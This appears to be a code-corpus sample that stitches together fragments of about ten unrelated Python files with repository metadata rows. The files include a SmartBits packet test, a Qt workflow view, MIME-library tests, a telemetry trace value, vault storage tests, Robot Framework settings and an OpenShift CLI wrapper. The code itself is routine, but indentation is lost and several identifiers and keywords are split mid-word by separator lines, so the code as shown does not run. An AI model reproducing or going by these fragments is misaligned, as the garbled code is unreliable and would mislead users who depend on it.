print " Oversize Pkts " , cs.Oversize
print " Undersize Pkts " , cs.Undersize
print "========================================="
promptForEnter()
def unlink():
ETUnLink()
####################################################################
# module self test. This is a translation from the 1stTest.c sample
# program.
if __name__ == "__main__":
import sys
hub1 = 0
slot1 = 0
port1 = 0
hub2 = 0
slot2 = 1
port2 = 0
numPackets = 100000
if len(sys.argv) > 1:
ipaddr = sys.argv[1]
else:
ipaddr = raw_input("Enter IP address of SmartBits chassis ==> ")
try:
ETSocketLink(ipaddr, 16385)
except Exception, err:
print "Error linking to chassis:", err
sys.exit()
print "successfully linked"
# reset cards
HTResetPort(RESET_FULL, hub1, slot1, port1)
HTResetPort(RESET_FULL, hub2, slot2, port2)
# clear counters
HTClearPort(hub1, slot1, port1)
HTClearPort(hub2, slot2, port2)
# set transmission parameters, single burst of numPackets packets
HTTransmitMode(SINGLE_BURST_MODE,hub1,slot1,port1)
HTBurstCount(numPackets,hub1,slot1,port1)
# start transmitting from the first card
HTRun(HTRUN,hub1,slot1,port1)
# you could need a delay here before reading counter data
raw_input("Press ENTER key to get counts.")
# get the transmit counts from card1 then the receive counts from card2
cs = HTCountStructure()
HTGetCounters(cs, hub1, slot1, port1)
txPackets = cs.TmtPkt
HTGetCounters(cs, hub2, slot2, port2)
rxPackets = cs.RcvPkt
if txPackets == rxPackets:
print "Test Passed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
else:
print "Test Failed! %d packets transmitted and %d packets received." % (txPackets, rxPac
|
MusculoskeletalAtlasProject/mapclient-src
|
mapclient/widgets/workflowgraphicsview.py
|
Python
|
gpl-3.0
| 10,128
| 0.002073
|
'''
MAP Client, a program to generate detailed musculoskeletal models for OpenSim.
Copyright (C) 2012 University of Auckland
This file is part of MAP Client. (http://launchpad.net/mapclient)
MAP Client is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
MAP Client is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with MAP Client. If not, see <http://www.gnu.org/licenses/>..
'''
import sys, math
from PySide import QtCore, QtGui
from mapclient.mountpoints.workflowstep import workflowStepFactory
from mapclient.widgets.workflowcommands import CommandSelection, CommandRemove, CommandAdd, CommandMove
from mapclient.core.workflowscene import MetaStep
from mapclient.widgets.workflowgraphicsitems import Node, Arc, ErrorItem, ArrowLine, StepPort
class WorkflowGraphicsView(QtGui.QGraphicsView):
def __init__(self, parent=None):
QtGui.QGraphicsView.__init__(self, parent)
self._selectedNodes = []
self._errorIconTimer = QtCore.QTimer()
self._errorIconTimer.setInterval(2000)
self._errorIconTimer.setSingleShot(True)
self._errorIconTimer.timeout.connect(self.errorIconTimeout)
self._errorIcon = None
self._undoStack = None
self._location = ''
self._connectLine = None
self._connectSourceNode = None
self._selectionStartPos = None
self.setCacheMode(QtGui.QGraphicsView.CacheBackground)
self.setRenderHint(QtGui.QPainter.Antialiasing)
grid_pic = QtGui.QPixmap(':/workflow/images/grid.png')
self._grid_brush = QtGui.QBrush(grid_pic)
# self.setTransformationAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
# self.setResizeAnchor(QtGui.QGraphicsView.AnchorViewCenter)
self.setAcceptDrops(True)
def clear(self):
self.scene().clear()
def setUndoStack(self, stack):
self._undoStack = stack
def setLocation(self, location):
self._location = location
def connectNodes(self, node1, node2):
# Check if nodes are already connected
if not node1.hasArcToDestination(node2):
if node1.canConnect(node2):
command = CommandAdd(self.scene(), Arc(node1, node2))
self._undoStack.push(command)
else:
# add temporary line ???
if self._errorIconTimer.isActive():
self._errorIconTimer.stop()
self.errorIconTimeout()
self._errorIcon = ErrorItem(node1, node2)
self.scene().addItem(self._errorIcon)
self._errorIconTimer.start()
def selectionChanged(self):
currentSelection = self.scene().selectedItems()
previousSelection = self.scene().previouslySelectedItems()
command = CommandSelection(self.scene(), currentSelection, previousSelection)
self._undoStack.push(command)
self.scene().setPreviouslySelectedItems(currentSelection)
def nodeSelected(self, node, state):
if state == True and node not in self._selectedNodes:
self._selectedNodes.append(node)
elif state == False and node in self._selectedNodes:
found = self._selectedNodes.index(node)
del self._selectedNodes[found]
if len(self._selectedNodes) == 2:
self.connectNodes(self._selectedNodes[0], self._selectedNodes[1])
def keyPressEvent(self, event):
# super(WorkflowGraphicsView, self).keyPressEvent(event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
command = CommandRemove(self.scene(), se
|
lf.scene().selectedItems())
self._undoStack.push(command)
event.accept()
else:
event.ignore()
def contextMenuEvent(self, event):
item = self.itemAt(event.pos())
if item and item.type() == Node.Type:
item.showContextMenu(event.globalPos())
def mousePressEvent(self, event):
item = self.scene().itemA
|
t(self.mapToScene(event.pos()))
if event.button() == QtCore.Qt.RightButton:
event.ignore()
elif item and item.type() == StepPort.Type:
centre = item.boundingRect().center()
self._connectSourceNode = item
self._connectLine = ArrowLine(QtCore.QLineF(item.mapToScene(centre),
self.mapToScene(event.pos())))
self.scene().addItem(self._connectLine)
else:
QtGui.QGraphicsView.mousePressEvent(self, event)
self._selectionStartPos = event.pos()
def mouseMoveEvent(self, event):
if self._connectLine:
newLine = QtCore.QLineF(self._connectLine.line().p1(), self.mapToScene(event.pos()))
self._connectLine.setLine(newLine)
else:
QtGui.QGraphicsView.mouseMoveEvent(self, event)
def mouseReleaseEvent(self, event):
if self._connectLine:
item = self.scene().itemAt(self.mapToScene(event.pos()))
if item and item.type() == StepPort.Type:
self.connectNodes(self._connectSourceNode, item)
self.scene().removeItem(self._connectLine)
self._connectLine = None
self._connectSourceNode = None
else:
QtGui.QGraphicsView.mouseReleaseEvent(self, event)
if self._selectionStartPos:
diff = event.pos() - self._selectionStartPos
if diff.x() != 0 and diff.y() != 0:
self._undoStack.beginMacro('Move Step(s)')
for item in self.scene().selectedItems():
if item.type() == Node.Type:
self._undoStack.push(CommandMove(item, item.pos() - diff, item.pos()))
self._undoStack.endMacro()
def errorIconTimeout(self):
self.scene().removeItem(self._errorIcon)
del self._errorIcon
def changeEvent(self, event):
if event.type() == QtCore.QEvent.EnabledChange:
self.invalidateScene(self.sceneRect())
def drawBackground(self, painter, rect):
# Shadow.
sceneRect = self.sceneRect()
rightShadow = QtCore.QRectF(sceneRect.right(), sceneRect.top() + 5, 5, sceneRect.height())
bottomShadow = QtCore.QRectF(sceneRect.left() + 5, sceneRect.bottom(), sceneRect.width(), 5)
if rightShadow.intersects(rect) or rightShadow.contains(rect):
painter.fillRect(rightShadow, QtCore.Qt.darkGray)
if bottomShadow.intersects(rect) or bottomShadow.contains(rect):
painter.fillRect(bottomShadow, QtCore.Qt.darkGray)
painter.setBrush(self._grid_brush) # QtCore.Qt.NoBrush
painter.drawRect(sceneRect)
def dropEvent(self, event):
if event.mimeData().hasFormat("image/x-workflow-step"):
pieceData = event.mimeData().data("image/x-workflow-step")
stream = QtCore.QDataStream(pieceData, QtCore.QIODevice.ReadOnly)
hotspot = QtCore.QPoint()
nameLen = stream.readUInt32()
name = stream.readRawData(nameLen).decode(sys.stdout.encoding)
stream >> hotspot
scene = self.scene()
position = self.mapToScene(event.pos() - hotspot)
metastep = MetaStep(workflowStepFactory(name, self._location))
node = Node(metastep)
metastep._step.registerConfiguredObserver(scene.stepConfigured)
metastep._step.registerDoneExecution(scene.doneExecution)
metastep._step.registerOnExecuteEntry(scene.setCurrentWidget)
metastep._step.registerIdentifierOccursCount(scene.identifierOccursCount)
self._und
|
glyph/flanker
|
tests/mime/message/create_test.py
|
Python
|
apache-2.0
| 10,627
| 0.000292
|
# coding:utf-8
from nose.tools import *
from mock import *
import email
import json
from base64 import b64decode
from flanker.mime import create
from flanker.mime.message import errors
from flanker.mime.message.part import MimePart
from email.parser import Parser
from ... import *
def from_python_message_test():
python_message = Parser().parsestr(MULTIPART)
message = create.from_python(python_message)
eq_(python_message['Subject'], message.headers['Subject'])
ctypes = [p.get_content_type() for p in python_message.walk()]
ctypes2 = [str(p.content_type) for p in message.walk(with_self=True)]
eq_(ctypes, ctypes2)
payloads = [p.get_payload(decode=True) for p in python_message.walk()][1:]
payloads2 = [p.body for p in message.walk()]
eq_(payloads, payloads2)
def from_string_message_test():
message = create.from_string(IPHONE)
parts = list(message.walk())
eq_(3, len(parts))
eq_(u'\n\n\n~Danielle', parts[2].body)
def from_part_message_simple_test():
message = create.from_string(IPHONE)
parts = list(message.walk())
message = create.from_message(parts[2])
eq_(u'\n\n\n~Danielle', message.body)
def message_from_garbage_test():
assert_raises(errors.DecodingError, create.from_string, None)
assert_raises(errors.DecodingError, create.from_string, [])
assert_raises(errors.DecodingError, create.from_string, MimePart)
def create_singlepart_ascii_test():
message = create.text("plain", u"Hello")
message = create.from_string(message.to_string())
eq_("7bit", message.content_encoding.value)
eq_("Hello", message.body)
def create_singlepart_unicode_test():
message = create.text("plain", u"Привет, курилка")
message = create.from_string(message.to_string())
eq_("base64", message.content_encoding.value)
eq_(u"Привет, курилка", message.body)
def create_singlepart_ascii_long_lines_test():
very_long = "very long line " * 1000 + "preserve my newlines \r\n\r\n"
message = create.text("plain", very_long)
message2 = create.from_string(message.to_string())
eq_("quoted-printable", message2.content_encoding.value)
eq_(very_long, message2.body)
message2 = email.message_from_string(message.to_string())
eq_(very_long, message2.get_payload(decode=True))
def create_multipart_simple_test():
message = create.multipart("mixed")
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"))
ok_(message.is_root())
assert_false(message.parts[0].is_root())
assert_false(message.parts[1].is_root())
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_("multipart/mixed", message2.content_type)
eq_(2, len(message.parts))
eq_("Hello", message.parts[0].body)
eq_("<html>Hello</html>", message.parts[1].body)
message2 = email.message_from_string(message.to_string())
eq_("multipart/mixed", message2.get_content_type())
eq_("Hello", message2.get_payload()[0].get_payload(decode=False))
eq_("<html>Hello</html>",
message2.get_payload()[1].get_payload(decode=False))
def create_multipart_with_attachment_test():
message = create.multipart("mixed")
filename = u"Мейлган картиночка картиноче
|
чка с длинным именем и пробельчиками"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
|
create.binary(
"image", "png", MAILGUN_PNG,
filename, "attachment"))
eq_(3, len(message.parts))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
eq_("base64", message2.parts[2].content_encoding.value)
eq_(MAILGUN_PNG, message2.parts[2].body)
eq_(filename, message2.parts[2].content_disposition.params['filename'])
eq_(filename, message2.parts[2].content_type.params['name'])
ok_(message2.parts[2].is_attachment())
message2 = email.message_from_string(message.to_string())
eq_(3, len(message2.get_payload()))
eq_(MAILGUN_PNG, message2.get_payload()[2].get_payload(decode=True))
def create_multipart_with_text_non_unicode_attachment_test():
"""Make sure we encode text attachment in base64
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.binary(
"text", "plain", u"Саша с уралмаша".encode("koi8-r"),
filename, "attachment"))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_(u"Саша с уралмаша", attachment.body)
def create_multipart_with_text_non_unicode_attachment_preserve_encoding_test():
"""Make sure we encode text attachment in base64
and also preserve charset information
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.text(
"plain",
u"Саша с уралмаша 2".encode("koi8-r"),
"koi8-r",
"attachment",
filename))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_("koi8-r", attachment.charset)
eq_(u"Саша с уралмаша 2", attachment.body)
def create_multipart_nested_test():
message = create.multipart("mixed")
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message.append(
create.text("plain", "Hello"),
nested)
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_('text/plain', message2.parts[0].content_type)
eq_('Hello', message2.parts[0].body)
eq_(u"Саша с уралмаша", message2.parts[1].parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", message2.parts[1].parts[1].body)
def create_enclosed_test():
message = create.text("plain", u"Превед")
message.headers['From'] = u' Саша <sasha@mailgun.net>'
message.headers['To'] = u'Женя <ev@mailgun.net>'
message.headers['Subject'] = u"Все ли ок? Нормальненько??"
message = create.message_container(message)
message2 = create.from_string(message.to_string())
eq_('message/rfc822', message2.content_type)
eq_(u"Превед", message2.enclosed.body)
eq_(u'Саша <sasha@mailgun.net>', message2.enclosed.headers['From'])
def create_enclosed_nested_test():
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message = create.multipart("mailgun-recipient-variables")
variables = {"a": u"<b>Саша</b>" * 1024}
message.append(
create.binary("application", "json", json.dumps(variables)),
create.message_container(nested))
message2 = create.from_string(message.to_string())
eq_(variables, json.loads(message2.parts[0].body))
nested = message2.parts[1].enclosed
eq_(2, len(nested.parts))
eq_(u"Саша с уралмаша", nested.parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", nested.parts[1].body)
def guessing_attachments_test():
binary = create.binary(
"application", 'octet-stream', MAILGUN_PNG, '/home/alex/mailgun.png')
eq_('image/png', binary.content_type)
eq_('mailgun.png', binary.content_type.params['name'])
binary = create.binary(
"application", 'octet-stream',
MAILGUN_PIC, '/home/alex/mailgun.png', disposition='attachment')
eq_('attachment', binary.headers['Content-Disposition'].value)
eq_('mailgun.png', binary.headers['Content-Disposition'].params['filename'])
binary = create.binary(
"application", 'octet-stream', NOTIFIC
|
SummerLW/Perf-Insight-Report
|
telemetry/telemetry/value/trace.py
|
Python
|
bsd-3-clause
| 4,564
| 0.008326
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import logging
import os
import random
import shutil
import StringIO
import sys
import tempfile
from catapult_base import cloud_storage # pylint: disable=import-error
from telemetry.internal.util import file_handle
from telemetry.timeline import trace_data as trace_data_module
from telemetry import value as value_module
from tracing_build import trace2html
class TraceValue(value_module.Value):
def __init__(self, page, trace_data, important=False, description=None):
"""A value that contains a TraceData object and knows how to
output it.
Adding TraceValues and outputting as JSON will produce a directory full of
HTML files called trace_files. Outputting as chart JSON will also produce
an index, files.html, linking to each of these files.
"""
super(TraceValue, self).__init__(
page, name='trace', units='', important=important,
description=description, tir_label=None)
self._temp_file = self._GetTempFileHandle(trace_data)
self._cloud_url = None
self._serialized_file_handle = None
def _GetTempFileHandle(self, trace_data):
if self.page:
title = self.page.display_name
else:
title = ''
content = StringIO.StringIO()
trace2html.WriteHTMLForTraceDataToFile(
[trace_data.GetEventsFor(trace_data_module.CHROME_TRACE_PART)],
title,
content)
tf = tempfile.NamedTemporaryFile(delete=False, suffix='.html')
tf.write(content.getvalue().encode('utf-8'))
tf.close()
return file_handle.FromTempFile(tf)
def __repr__(self):
if self.page:
page_name = self.page.display_name
else:
page_name = 'None'
return 'TraceValue(%s, %s)' % (page_name, self.name)
def CleanUp(self):
"""Cleans up tempfile after it is no longer needed.
A cleaned up TraceValue cannot be used for further operations. CleanUp()
may be called more than once without error.
"""
if self._temp_file is None:
return
os.remove(self._temp_file.GetAbsPath())
self._temp_file = None
def __enter__(self):
return self
def __exit__(self, _, __, ___):
self.CleanUp()
@property
def cleaned_up(self):
return self._temp_file is None
def GetBuildbotDataType(self, output_context):
return None
def GetBuildbotValue(self):
return None
def GetRepresentativeNumber(self):
return None
def GetRepresentativeString(self):
return None
@staticmethod
def GetJSONTypeName():
return 'trace'
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
assert len(values) > 0
return values[0]
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values):
return None
def AsDict(self):
if self._temp_file is None:
raise ValueError('Tried to serialize TraceValue without tempfile.')
d = super(TraceValue, self).AsDict()
if self._serialized_file_handle:
d['file_id'] = self._serialized_file_handle.id
if self._cloud_url:
d['cloud_url'] = self._cloud_url
return d
def Serialize(self, dir_path):
if self._temp_file is None:
raise ValueError('Tried to serialize nonexistent trace.')
file_name = str(self._temp_file.id) + self._temp_file.extension
file_path = os.path.abspath(os.path.join(dir_path, file_name))
shutil.copy(self._temp_file.GetAbsPath(), file_path)
self._serialized_file_handle = file_handle.FromFilePath(file_path)
retur
|
n self._serialized_file_handle
def UploadToCloud(self, bucket):
if self._temp_file is None:
raise ValueError('Tried to upload nonexistent trace to Cloud Storage.')
try:
if self._serialized_file_handle:
fh = self._serialized_file_handle
else:
fh = self._temp_file
remote_path = ('trace-file-id_%s-%s-%d%s' % (
fh.id,
datetime.datetime.now().strftime('%Y-%
|
m-%d_%H-%M-%S'),
random.randint(1, 100000),
fh.extension))
self._cloud_url = cloud_storage.Insert(
bucket, remote_path, fh.GetAbsPath())
sys.stderr.write(
'View generated trace files online at %s for page %s\n' %
(self._cloud_url, self.page.url if self.page else 'unknown'))
return self._cloud_url
except cloud_storage.PermissionError as e:
logging.error('Cannot upload trace files to cloud storage due to '
' permission error: %s' % e.message)
|
drtoful/pyvault
|
tests/02_store_test.py
|
Python
|
bsd-3-clause
| 1,342
| 0.002981
|
import unittest
import os
from nose.tools import assert_true
from nose.tools import assert_false
from pyvault import PyVault
from pyvault.backends.file import PyVaultFileBackend
from pyvault.backends.ptree import PyVaultPairtreeBackend
class VaultStore(unittest.TestCase):
"""
testing storing data into the vault with differe
|
nt
backends and their resulting files.
"""
def test_store_file(self):
backend = PyVaultFileBackend("/tmp/_pyvault_file")
vault = PyVault(backend)
vault.unlock("passphrase", Fa
|
lse)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_file/8335fa56d487562de248f47befc72743334051ddffcc2c09275f665454990317594745ee17c08f798cd7dce0ba8155dcda14f6398c1d1545116520a133017c09"))
def test_store_ptree(self):
backend = PyVaultPairtreeBackend("/tmp/_pyvault_ptree")
vault = PyVault(backend)
vault.unlock("passphrase", False)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_ptree/pairtree_root/83/35/fa/56/d4/87/56/2d/e2/48/f4/7b/ef/c7/27/43/33/40/51/dd/ff/cc/2c/09/27/5f/66/54/54/99/03/17/59/47/45/ee/17/c0/8f/79/8c/d7/dc/e0/ba/81/55/dc/da/14/f6/39/8c/1d/15/45/11/65/20/a1/33/01/7c/09/obj/data"))
|
callowayproject/django-articleappkit
|
articleappkit/fields.py
|
Python
|
apache-2.0
| 1,369
| 0.002191
|
import datetime
import os
from django.db.models.fields.files import FileField
from django.core.files.storage import default_storage
from django.utils.encoding import force_unicode, smart_str
class ModelUploadFileField(FileField):
"""
Makes the upload_to parameter optional by using the name of the model
"""
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
for arg in ('primary_key', 'unique'):
if arg in kwargs:
raise TypeError("'%s' is not a valid argument for %s." % (arg, self.__class__))
self.storage = storage or default_storage
upload_to = kwargs.pop('upload_to', '$$MODEL$$')
if not upload_to:
upload_to = '$$MODEL$$'
self.upload_to = upload_to
if
|
callable(upload_to):
self.generate_filename = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super(FileField, self).__init__(verbose_name, name, **kwargs)
def get_directory_name(self):
return os.path.normpath(force_unicode(datetime.datetime.now().strftime(smart_str(self.upload_to))))
def generate_filename(self, instance, filename):
if self.upload_to == '$$MODEL$$':
self.upload_to = instance._meta.verbose_name
|
return os.path.join(self.get_directory_name(), self.get_filename(filename))
|
pybursa/homeworks
|
o_shestakoff/hw5/hw5_tests.py
|
Python
|
gpl-2.0
| 953
| 0.001072
|
# -*- coding: utf8 -*-
u"""
Тесты на ДЗ#5.
"""
__author__ = "wowkalucky"
__email__ = "wowkalucky@gmail.com"
__date__ = "2014-11-17"
import datetime
from hw5_solution1 import Person
def tests_for_hw5_solution1():
u"""Тесты задачи 1"""
petroff = Person("Petrov", "Petro", "1952-01-02")
ivanoff = Person("Ivanov", "Ivan", "2000-10-20")
sydoroff = Person("Sidorov", "Semen", "1980-12-31", "Senya")
assert "first_name" in dir(petroff)
assert "get_fullname" in
|
dir(ivanoff)
assert "nickname" not in dir(petroff)
assert "nickname" in dir(sydoroff)
assert petroff.surname == "Petrov"
assert petroff.first_na
|
me == "Petro"
assert petroff.get_fullname() == "Petrov Petro"
assert sydoroff.nickname == "Senya"
assert petroff.birth_date == datetime.date(1952, 01, 02)
assert isinstance(petroff.birth_date, datetime.date)
assert petroff.get_age() == "62"
print 'All is Ok!'
|
wojciechtanski/robotframework
|
src/robot/conf/settings.py
|
Python
|
apache-2.0
| 20,981
| 0.003146
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import random
import sys
import time
from robot import utils
from robot.errors import DataError, FrameworkError
from robot.output import LOGGER, loggerhelper
from robot.result.keywordremover import KeywordRemover
from robot.result.flattenkeywordmatcher import FlattenKeywordMatcher
from .gatherfailed import gather_failed_tests
class _BaseSettings(object):
_cli_opts = {'Name' : ('name', None),
'Doc' : ('doc', None),
'Metadata' : ('metadata', []),
'TestNames' : ('test', []),
'ReRunFailed' : ('rerunfailed', 'NONE'),
'DeprecatedRunFailed': ('runfailed', 'NONE'), # TODO: Remove in RF 2.10/3.0.
'SuiteNames' : ('suite', []),
'SetTag' : ('settag', []),
'Include' : ('include', []),
'Exclude' : ('exclude', []),
'Critical' : ('critical', None),
'NonCritical' : ('noncritical', None),
'OutputDir' : ('outputdir', utils.abspath('.')),
'Log' : ('log', 'log.html'),
'Report' : ('report', 'report.html'),
'XUnit' : ('xunit', None),
'SplitLog' : ('splitlog', False),
'TimestampOutputs' : ('timestampoutputs', False),
'LogTitle' : ('logtitle', None),
'ReportTitle' : ('reporttitle', None),
'ReportBackground' : ('reportbackground',
('#99FF66', '#99FF66', '#FF3333')),
'SuiteStatLevel' : ('suitestatlevel', -1),
'TagStatInclude' : ('tagstatinclude', []),
'TagStatExclude' : ('tagstatexclude', []),
'TagStatCombine' : ('tagstatcombine', []),
'TagDoc' : ('tagdoc', []),
'TagStatLink' : ('tagstatlink', []),
'RemoveKeywords' : ('removekeywords', []),
'FlattenKeywords' : ('flattenkeywords', []),
'StatusRC' : ('statusrc', True),
'MonitorColors' : ('monitorcolors', 'AUTO'),
'StdOut' : ('stdout', None),
'StdErr' : ('stderr', None),
'XUnitSkipNonCritical' : ('xunitskipnoncritical', False)}
_output_opts = ['Output', 'Log', 'Report', 'XUnit', 'DebugFile']
def __init__(self, options=None, **extra_options):
self.start_timestamp = utils.format_time(time.time(), '', '-', '')
self._opts = {}
self._cli_opts = self._cli_opts.copy()
self._cli_opts.update(self._extra_cli_opts)
self._process_cli_opts(dict(options or {}, **extra_options))
def _process_cli_opts(self, opts):
for name, (cli_name, default) in self._cli_opts.items():
value = opts[cli_name] if cli_name in opts else default
if default == [] and isinstance(value, basestring):
value = [value]
self[name] = self._process_value(name, value)
self['TestNames'] += self['ReRunFailed'] or self['DeprecatedRunFailed']
def __setitem__(self, name, value):
if name not in self._cli_opts:
raise KeyError("Non-existing settings '%s'" % name)
self._opts[name] = value
def _process_value(self, name, value):
if name == 'ReRunFailed':
return gather_failed_tests(value)
if name == 'DeprecatedRunFailed':
if value.upper() != 'NONE':
LOGGER.warn('Option --runfailed is deprecated and will be '
'removed in the future. Use --rerunfailed instead.')
return gather_failed_tests(value)
if name == 'DeprecatedMerge' and value is True:
LOGGER.warn('Option --rerunmerge is deprecated and will be '
'removed in the future. Use --merge instead.')
if name == 'LogLevel':
return self._process_log_level(value)
if value == self._get_default_value(name):
return value
if name in ['Name', 'Doc', 'LogTitle', 'ReportTitle']:
if name == 'Doc':
value = self._escape_as_data(value)
return value.replace('_', ' ')
if name in ['Metadata', 'TagDoc']:
if name == 'Metadata':
value = [self._escape_as_data(v) for v in value]
return [self._process_metadata_or_tagdoc(v) for v in value]
if name in ['Include', 'Exclude']:
return [self._format_tag_patterns(v) for v in value]
if name in self._output_opts and (not value or value.upper() == 'NONE'):
return None
if name == 'OutputDir':
return utils.abspath(value)
if name in ['SuiteStatLevel', 'MonitorWidth']:
return self._convert_to_positive_integer_or_default(name, value)
if name in ['Listeners', 'VariableFiles']:
return [self._split_args_from_name_or_path(item) for item in value]
if name == 'ReportBackground':
return self._process_report_background(value)
if name == 'TagStatCombine':
return [self._process_tag_stat_combine(v) for v in value]
if name == 'TagStatLink':
return [v for v in [self._process_tag_stat_link(v) for v in value] if v]
if name == 'Randomize':
return self._process_randomize_value(value)
if name == 'RemoveKeywords':
self._validate_remove_keywords(value)
if name == 'FlattenKeywords':
self._validate_flatten_keywords(value)
return value
def _escape_as_data(self, value):
return value
def _process_log_level(self, level):
level, visible_level = self._split_log_level(level.upper())
self._opts['VisibleLogLevel'] = visible_level
return level
def _split_log_level(self, level):
if ':' in level:
level, visible_level = level.split(':', 1)
else:
visible_level = level
self._validate_log_level_and_default(level, visible_level)
return level, visible_level
def _validate_log_level_and_default(self, log_level, default):
if log_level not i
|
n loggerhelper.LEVELS:
raise DataError("Invalid log level '%s'" % log_level)
if default not in loggerhelper.LEVELS:
raise DataError("Invalid log level '%s'" % defa
|
ult)
if not loggerhelper.IsLogged(log_level)(default):
raise DataError("Default visible log level '%s' is lower than "
"log level '%s'" % (default, log_level))
def _process_randomize_value(self, original):
value = original.lower()
if ':' in value:
value, seed = value.split(':', 1)
else:
seed = random.randint(0, sys.maxint)
if value in ('test', 'suite'):
value += 's'
if value not in ('tests', 'suites', 'none', 'all'):
self._raise_invalid_option_value('--randomize', original)
try:
seed = int(seed)
except ValueError:
self._raise_invalid_option_value('--randomize', original)
return value, seed
def _raise_invalid_option_value(self, option_name, given_value):
raise DataError("Option '%s' does not support value '%s'."
% (option_na
|
zerolab/wagtail
|
wagtail/tests/demosite/migrations/0002_capitalizeverbose.py
|
Python
|
bsd-3-clause
| 318
| 0
|
#
|
-*- coding: utf-8 -*-
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('demosite', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='homepage',
option
|
s={'verbose_name': 'homepage'},
),
]
|
ivanhorvath/openshift-tools
|
ansible/roles/lib_openshift_3.2/library/oc_secret.py
|
Python
|
apache-2.0
| 37,290
| 0.002789
|
#!/usr/bin/env python # pylint: disable=too-many-lines
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
import atexit
import json
import os
import re
import shutil
import subprocess
import ruamel.yaml as yaml
#import yaml
#
## This is here because of a bug that causes yaml
## to incorrectly handle timezone info on timestamps
#def timestamp_constructor(_, node):
# '''return timestamps as strings'''
# return str(node.value)
#yaml.add_constructor(u'tag:yaml.org,2002:timestamp', timestamp_constructor)
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = kubeconfig
self.all_namespaces = all_namespaces
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = '/tmp/%s' % rname
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''return all pods '''
cmd = ['-n', self.namespace, 'replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''return all pods '''
fname = '/tmp/%s' % rname
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''return all pods '''
return self.openshift_cmd(['create', '-f', fname, '-n', self.namespace])
def _delete(self, resource, rname, selector=None):
'''return all pods '''
cmd = ['delete', resource, rname, '-n', self.namespace]
if selector:
cmd.append('--selector=%s' % selector)
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None):
'''return all pods '''
cmd = ['process', '-n', self.namespace]
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["%s=%s" % (key, value) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
